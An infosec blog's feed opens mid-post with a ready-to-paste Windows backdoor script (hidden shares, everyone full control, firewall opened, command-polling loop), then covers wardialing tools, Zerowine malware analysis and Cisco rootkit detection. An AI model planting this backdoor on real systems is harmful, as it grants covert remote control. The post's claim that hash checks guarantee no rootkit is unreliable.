&lt;/span&gt;To do this we use the net share command, but we put a dollar sign at the end of each share name so the shares aren't listed when someone browses the network.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;net share input$=c:\windows\system\input&lt;br /&gt;net share output$=c:\windows\system\output&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now the next step is up to you and your rules of engagement. What we want to do is control access to these shares. The easiest way is to give the folders the everyone permission, but this might introduce new vulnerabilities into the system. It might be prudent to create a new user on the system and then give only that user permission to these folders. It's up to you, but for the sake of the example we will use the everyone permission.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;echo Y| cacls c:\windows\system\input /P everyone:F&lt;br /&gt;echo Y| cacls c:\windows\system\output /P everyone:F&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Next we open the Windows Firewall for file and printer sharing so Windows will actually serve these shares on the network. We do this with some netsh fu.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;netsh firewall set service type = FILEANDPRINT mode = ENABLE&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;We now want to dump a command in our commands.txt file. This is the file we echo into to run commands through the backdoor. We want to dump a sample command to this file to make sure our loop is successful. The command is:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo ipconfig /all &gt; c:\windows\system\input\commands.txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now we finally set our loop in motion. 
This loop takes the commands from commands.txt, runs them and then dumps the output to output.txt. The loop looks like the following.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j &gt;&gt; c:\windows\system\output\output.txt &amp;amp; del c:\windows\system\input\commands.txt) &amp;amp; ping -n 2 127.0.0.1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I know this looks like someone threw up on your command line. It works though!! What it does is look for the commands.txt file. It then reads the file, runs the command in the file, appends the output to the output.txt file and deletes commands.txt. The outer for /L loop with a step of 0 never ends, and the ping acts as the sleep, so it does this every two seconds. So what we have is the following script that can be pasted into a shell.&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;'make them&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;mkdir c:\windows\system\input&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;mkdir c:\windows\system\output&lt;/span&gt;  &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;'hide them&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;attrib c:\windows\system\input +H +S&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;attrib c:\windows\system\output +H +S&lt;br /&gt;&lt;br /&gt;'share them&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;net share input$=c:\windows\system\input&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;net share output$=c:\windows\system\output&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;'allow everyone into them&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;echo Y| cacls c:\windows\system\input /P everyone:F&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;echo Y| 
cacls c:\windows\system\output /P everyone:F&lt;/span&gt;  &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;'open the firewall for file and printer sharing&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;netsh firewall set service type = FILEANDPRINT mode = ENABLE&lt;/span&gt;  &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;'dump a sample command into commands.txt&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;echo ipconfig /all &gt; c:\windows\system\input\commands.txt&lt;/span&gt;  &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;'Use Ed Skoudis's for /L loop&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j &gt;&gt; c:\windows\system\output\output.txt &amp;amp; del c:\windows\system\input\commands.txt) &amp;amp; ping -n 2 127.0.0.1&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;So you can now copy out the above text and paste it into your shell. 
If you want to make this a batch file, make sure that you change all of the % symbols in the loop to %%; then it will work as a batch file.&lt;br /&gt;&lt;br /&gt;To make sure it's working after you start the loop, use the following command.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;type \\(ip-address)\output$\output.txt&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;br /&gt;You should see the output of &lt;span style="font-weight: bold;"&gt;ipconfig /all&lt;/span&gt; on the screen.&lt;br /&gt;&lt;br /&gt;To run a new command we use the following:&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;echo (command) &gt; \\(ip-address)\input$\commands.txt&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Ok so that's it, a quick, simple and dirty Windows command line backdoor.&lt;br /&gt;&lt;br /&gt;In the next post I will write a script that uses WMI to copy over any payload you want and then run it. You can use the runas command and run the script as a user that you have already compromised. 
You can then turn the above script into a batch file and run it without having to pop a shell on the machine.</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/8385414902131393349/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=8385414902131393349' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/8385414902131393349'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/8385414902131393349'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2009/03/attack-script-part-1.html' title='Attack Script Part 1'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-6212227210276324998</id><published>2009-03-07T07:43:00.013-05:00</published><updated>2009-03-09T11:19:25.727-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='WarDialing'/><category scheme='http://www.blogger.com/atom/ns#' term='H D Moore'/><category scheme='http://www.blogger.com/atom/ns#' term='Telesweep'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Warvox'/><title type='text'>The Return of Wardialing</title><content type='html'>Wardialing is kind of a lost art in the 
hacking community. Some of us used THC-SCAN or ToneLoc back in the day to dial out as many prefixes as possible trying to find a low-security backdoor into systems. With the inception of VOIP this skillset has come back into play and is a really valid skill for penetration testers. You would be shocked at how many organizations still use dial-in for systems administration. I have seen routers with modems directly connected to console cables and tons of embedded devices with modems still hanging off of them. In this post I will show you how to wardial with two different tools.&lt;br /&gt;&lt;br /&gt;The first tool was a paid commercial tool but is now a free tool. This tool is SecureLogix TeleSweep. It requires SOUL SUCKING REGISTRATION but it's a good free Windows wardialer. If you don't want to register, our second tool is an open source tool, so just read on.&lt;br /&gt;&lt;br /&gt;First you need to download SecureLogix Telesweep. You can register and download the tool here&lt;br /&gt;&lt;a href="http://www.securelogix.com/modemscanner/tss_agreement1.htm"&gt; &lt;span style="font-weight: bold;"&gt;http://www.securelogix.com/modemscanner/tss_agreement1.htm &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Once you have downloaded the application you can unzip and install it. This installs just like any other Windows application and shouldn't be a problem for anyone familiar with Windows. The next step is to execute the dialer configuration tool. Telesweep is a distributed application, so it allows you to have several dialers report back to one manager. Walk through the wizard, set up your modem and enter the license that was sent in the email from SecureLogix. Make sure your modem is recognized by scanning for it.&lt;br /&gt;&lt;br /&gt;The next step is to open the Telesweep secure management server and license it. Then it will open a profile and show you computers that are attached to the management server. 
This allows you to connect several machines and then run them all against a prefix.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_IYfuPD9qO24/SbJ89MC_LCI/AAAAAAAAAHw/D4Oy3qlhmpw/s1600-h/telesweep.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="http://4.bp.blogspot.com/_IYfuPD9qO24/SbJ89MC_LCI/AAAAAAAAAHw/D4Oy3qlhmpw/s320/telesweep.jpg" alt="" id="BLOGGER_PHOTO_ID_5310444301270854690" border="0" /&gt;&lt;/a&gt;Once open you can double click on the sample profile. This will show you some of the power of this tool. You can dial numbers; you can also give it a list of usernames and passwords to try against a target once it has detected a carrier. So this tool will dial, try to automatically penetrate, and then give a report of what it has done.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_IYfuPD9qO24/SbKAcILufbI/AAAAAAAAAH4/Lsi0G6XyuuM/s1600-h/profile.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 184px;" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SbKAcILufbI/AAAAAAAAAH4/Lsi0G6XyuuM/s320/profile.jpg" alt="" id="BLOGGER_PHOTO_ID_5310448131344596402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;All in all this is a great tool for stand-alone wardialing, but in combination with the next tool we are going to discuss it becomes even better for targeted attacking because of its penetration ability.&lt;br /&gt;&lt;br /&gt;The next tool we are going to talk about is a new one from the venerable H D Moore. Anyone who doesn't know who H D is probably shouldn't be reading this blog. H D is a personal hero of mine and has built the absolute best open source exploitation tool, Metasploit. His new tool is called WarVox. 
WarVox allows you to leverage VOIP providers to execute your wardialing attack and then it records its results in sound files. It's a new spin on wardialing but allows you to have great speed.&lt;br /&gt;&lt;br /&gt;So let's install WarVox. You need Linux for WarVox. I will be doing the install on BackTrack 4 but you can also use Ubuntu. I will be using the svn version; if you prefer to use a stable tar file they are available for download.&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Open a command line in your Linux distribution and type in&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;sudo apt-get install build-essential libiaxclient-dev sox lame ruby rake rubygems libsqlite3-ruby gnuplot&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;This will take care of all of the dependencies needed for WarVox.&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Next we want to install mongrel to improve the speed of WarVox. Use the following command to do this&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;gem install mongrel&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Next we want to download WarVox, so we use:&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;svn co &lt;/span&gt;&lt;a href="http://metasploit.com/svn/warvox/trunk/"&gt;&lt;span style="font-weight: bold;"&gt;http://metasploit.com/svn/warvox/trunk/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;We probably want to rename the directory to something more descriptive after downloading it. 
I renamed it to WarVox by using the following:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;mv trunk WarVox&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Next we enter the WarVox directory and type &lt;span style="font-weight: bold;"&gt;make&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;If everything builds correctly you will be greeted with the following text:&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_IYfuPD9qO24/SbKJI1mGj1I/AAAAAAAAAII/A6TT5SwlZZo/s1600-h/warvox.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 143px;" src="http://2.bp.blogspot.com/_IYfuPD9qO24/SbKJI1mGj1I/AAAAAAAAAII/A6TT5SwlZZo/s320/warvox.jpg" alt="" id="BLOGGER_PHOTO_ID_5310457695542087506" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Finally we start WarVox with the following:&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;bin/warvox.rb&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Then we browse to 127.0.0.1:7777; if everything worked out we will be greeted by a username and password prompt. The default username is admin and the password is warvox. You can change these by editing the warvox.conf file&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;. 
&lt;/span&gt;&lt;span&gt;Then we get a nice web interface:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_IYfuPD9qO24/SbKRmPsSo0I/AAAAAAAAAIQ/79nl_V7t6I0/s1600-h/warvox.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 218px;" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SbKRmPsSo0I/AAAAAAAAAIQ/79nl_V7t6I0/s320/warvox.jpg" alt="" id="BLOGGER_PHOTO_ID_5310466996856595266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;After the installation of the program you can set it up with a service provider and begin wardialing. The beauty of this program is its speed and its ability to fingerprint a line as fax, voice, etc. If you use the two programs I have shown in combination they will give very good wardialing results in a very short period of time. Use WarVox first, then put the results into Telesweep to drill down further on your targets. Both of these tools together can give a very lucrative wardialing experience. 
In a world of VOIP wardialing should be a part of every VOIP penetration test.</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/6212227210276324998/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=6212227210276324998' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/6212227210276324998'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/6212227210276324998'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2009/03/return-of-wardialing.html' title='The Return of Wardialing'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_IYfuPD9qO24/SbJ89MC_LCI/AAAAAAAAAHw/D4Oy3qlhmpw/s72-c/telesweep.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-1889510076681890307</id><published>2009-01-04T09:23:00.017-05:00</published><updated>2009-03-09T13:41:28.993-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Zerowine'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Analysis'/><category scheme='http://www.blogger.com/atom/ns#' term='Qemu'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet Storm Center'/><category 
scheme='http://www.blogger.com/atom/ns#' term='Vmware'/><title type='text'>Automated Malware Analysis with Zerowine</title><content type='html'>I recently did some work with Zerowine, a web-based, Debian-based automated malware analysis tool. My efforts got me a little writeup on the &lt;a href="http://isc.sans.org/diary.html?storyid=5611"&gt;Internet Storm Center&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;This is a follow-up post to show all of the steps I took to get this tool going in VMware instead of its default QEmu. This post illustrates a Windows configuration but will still work on Linux for the most part.&lt;br /&gt;&lt;br /&gt;The first step we need to take is to download Zerowine. You can download it &lt;a href="http://sourceforge.net/projects/zerowine/"&gt;here&lt;/a&gt;. This comes as a prebuilt QEmu image.&lt;br /&gt;&lt;br /&gt;The next step is to download QEmu for Windows. You can download it &lt;a href="http://www1.interq.or.jp/t-takeda/qemu/qemu-20081229-windows.zip"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Once you have both of these files and have extracted them, you will need to try to run the virtual machine. (If you don't want to run this in QEmu at all, skip the next paragraph.)&lt;br /&gt;&lt;br /&gt;To call a QEmu virtual machine you use a batch file. QEmu is somewhat like Dynamips for those of you who are familiar with this type of virtual machine usage. We will need to create a batch file to call qemu.exe. This batch file will vary from computer to computer. Specifically, my batch file has this line to run the virtual machine. This should run Zerowine with QEmu.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;qemu.exe -L . -m 128 -hda C:\zerowine_vm\hda.img -redir tcp:8000:10.2.0.15:8000&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;I wanted to use VMware, so what I did is convert the image file to .vmdk format and use it with VMware. Luckily we already have the tool we need to do this: qemu-img.exe can convert .img files to .vmdk. 
So the command we use to do this is&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;qemu-img.exe convert c:\zerowine_vm\hda.img -O vmdk c:\zerowine_vm\zerowine.vmdk&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;After a few minutes a .vmdk file should appear in the directory you specified. Now it's time to create a new virtual machine and attach the zerowine.vmdk file that we just created.&lt;br /&gt;&lt;br /&gt;To start we open Vmware workstation and choose &lt;strong&gt;File&gt;New&gt;Virtual Machine&lt;/strong&gt;. Then you choose &lt;strong&gt;Next&lt;/strong&gt; then &lt;strong&gt;Custom&lt;/strong&gt; and Next 2 times. Then choose Linux and Other Linux 2.6.x kernel.&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_IYfuPD9qO24/SWE5q_t4A8I/AAAAAAAAAG4/1nIE2tvEnxY/s1600-h/newvm.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5287570848330810306" style="margin: 0px auto 10px; display: block; width: 320px; height: 278px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SWE5q_t4A8I/AAAAAAAAAG4/1nIE2tvEnxY/s320/newvm.jpg" border="0" /&gt;&lt;/a&gt; Then Next through until you reach the networking section. In the Networking section choose NAT networking. Then Next twice and you will get to the Select a Disk section. Choose use existing and point this at our .vmdk file that we created earlier. After this finish the Virtual Machine wizard and boot it up.&lt;/p&gt;&lt;p&gt;&lt;a href="http://1.bp.blogspot.com/_IYfuPD9qO24/SWFRkFkta8I/AAAAAAAAAHI/Me12u-JAC5Y/s1600-h/useexisting.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5287597117922962370" style="margin: 0px auto 10px; display: block; width: 320px; height: 278px; text-align: center;" alt="" src="http://1.bp.blogspot.com/_IYfuPD9qO24/SWFRkFkta8I/AAAAAAAAAHI/Me12u-JAC5Y/s320/useexisting.jpg" border="0" /&gt;&lt;/a&gt; Ok so now we have a booting image of zerowine. We have a few steps left. The first step is to change the keyboard map then we need to change a file to get eth0 to come up correctly. 
To do this &lt;strong&gt;log in as root with a password of zerowine&lt;/strong&gt;. Then type&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;dpkg-reconfigure console-data&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Walk through this wizard and change your keyboard map to pc us standard, then use the following command&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;vi /etc/udev/rules.d/z25_persistent-net.rules&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Then delete all lines in this file. The persistent-net rules pin an interface name to the MAC address it was first seen with, so if the image was booted in QEmu previously, the VMware virtual NIC (which has a different MAC) would come up as eth1 and you would not see eth0 in ifconfig. Clearing the file lets udev assign eth0 to the new NIC on the next boot.&lt;br /&gt;&lt;br /&gt;Then in the VMware window choose &lt;span style="font-weight: bold;"&gt;Edit&gt;Virtual Network Settings&lt;/span&gt;. Then choose the NAT tab. Then choose the &lt;strong&gt;edit button&lt;/strong&gt;. Then the &lt;strong&gt;Port Forwarding&lt;/strong&gt; button and finally the &lt;strong&gt;add&lt;/strong&gt; button. Enter the host port of 8000, the IP address of the virtual machine and then port 8000. If you don't know the IP of the virtual machine, run &lt;strong&gt;ifconfig eth0&lt;/strong&gt; inside it. This will give you the IP address of the virtual machine.&lt;/p&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_IYfuPD9qO24/SWFTNR3lnlI/AAAAAAAAAHQ/L1-SSScA9hY/s1600-h/port-forwarding.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5287598925109632594" style="margin: 0px auto 10px; display: block; width: 320px; height: 294px; text-align: center;" alt="" src="http://2.bp.blogspot.com/_IYfuPD9qO24/SWFTNR3lnlI/AAAAAAAAAHQ/L1-SSScA9hY/s320/port-forwarding.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p&gt;Finally enter &lt;strong&gt;127.0.0.1:8000&lt;/strong&gt; in a browser and you will get the Zerowine web interface. 
It should look like the following.&lt;/p&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_IYfuPD9qO24/SWFQcHtXpNI/AAAAAAAAAHA/xGC8g3EUKP0/s1600-h/zerowineweb.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5287595881545573586" style="margin: 0px auto 10px; display: block; width: 320px; height: 145px; text-align: center;" alt="" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SWFQcHtXpNI/AAAAAAAAAHA/xGC8g3EUKP0/s320/zerowineweb.jpg" border="0" /&gt;&lt;/a&gt; That's it then: we have a cool incident response and malware analysis tool working in VMware. The reports aren't bad and it does unpacking as well. I hope newer versions expand on the functionality of this tool.&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/1889510076681890307/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=1889510076681890307' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/1889510076681890307'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/1889510076681890307'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2009/01/automated-malware-analysis-with.html' title='Automated Malware Analysis with Zerowine'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 
url='http://3.bp.blogspot.com/_IYfuPD9qO24/SWE5q_t4A8I/AAAAAAAAAG4/1nIE2tvEnxY/s72-c/newvm.jpg' height='72' width='72'/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-2776952348620398124</id><published>2008-12-16T18:17:00.019-05:00</published><updated>2009-01-02T06:55:53.230-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Verification of IOS'/><category scheme='http://www.blogger.com/atom/ns#' term='IOS Resiliancy'/><category scheme='http://www.blogger.com/atom/ns#' term='Cisco'/><category scheme='http://www.blogger.com/atom/ns#' term='Archive Command'/><title type='text'>Cisco Router Rootkits</title><content type='html'>Core Security's Sebastian Muniz demonstrated that a rootkit could be installed on Cisco routers earlier this year. Since then I have been thinking of possible mitigation techniques for this type of problem. Like any type of rootkit, mitigation is only possible after detection. So how do we detect a rootkit on a Cisco router? I am going to outline some different techniques to help identify and verify an IOS image.&lt;br /&gt;&lt;br /&gt;The first technique is a very basic one: logging. So how do we do that? On a local network where you aren't worried about encryption, using syslog is a viable solution. We do this by using the following commands.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config)# logging on&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config)# logging host x.x.x.x&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;With logging on we now know what is happening to the router. We can see if it is being attacked, if someone logs in and, most importantly, we can track configuration changes. Speaking of tracking configuration changes, how do we do that? 
Another couple of commands can do that for us.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config)#archive&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config-archive)# log config&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config-archive-log-config)# logging enable&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config-archive-log-config)# logging size 200&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config-archive-log-config)# hidekeys&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config-archive-log-config)# notify syslog&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;With this configuration in place we can see any configuration changes logged right to syslog. This can help us to see if an attacker makes a change to the system.&lt;br /&gt;&lt;br /&gt;The next technique is the verify command, which lets us check files on the router and make sure that the MD5 hash matches what Cisco provides.&lt;br /&gt;&lt;br /&gt;I would recommend that if you really think you have a rootkit on your router you transfer the IOS image off of the router and verify it externally using an md5 hash verifier, since you cannot fully trust a possibly compromised IOS to report its own hash honestly.&lt;br /&gt;&lt;br /&gt;On the router itself, the verify command checks the hash of a file stored in flash. 
It works like the following (verify is a privileged EXEC command, not a configuration command).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router#verify /md5 filename&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If you see that the hash doesn't match then you should replace the image with one that has a correct md5 sum.&lt;br /&gt;&lt;br /&gt;Last but not least is the secure command, or the Cisco IOS Resilient Configuration.&lt;br /&gt;&lt;br /&gt;This little known command allows you to store an image of the IOS and the configuration on the router in an area not accessible to any user.&lt;br /&gt;&lt;br /&gt;To configure this you must make sure that you have an IOS greater than 12.3(8)T. Then use the following commands:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config)#secure boot-config&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router(config)#secure boot-image&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This set of commands allows you to store a known good config and IOS in the router which can be restored in ROMMON mode. To verify that it worked you can use the following command&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;Router#show secure bootset&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In short, the commands and techniques that I have outlined can help you verify that your IOS image is a known good file, which guarantees that there isn't a rootkit installed on your router. 
The odds of this type of attack happening are slim to none but you should be able to verify this as part of Incident Response.</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/2776952348620398124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=2776952348620398124' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2776952348620398124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2776952348620398124'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/12/cisco-router-rootkits.html' title='Cisco Router Rootkits'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-773712366884213488</id><published>2008-11-22T20:55:00.006-05:00</published><updated>2009-03-09T13:43:36.935-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ophcrack'/><category scheme='http://www.blogger.com/atom/ns#' term='fgdump'/><category scheme='http://www.blogger.com/atom/ns#' term='John the Ripper'/><title type='text'>Smashing the Hash</title><content type='html'>In today's post we are going to talk about stealing password hashes and then recovering the passwords from them. 
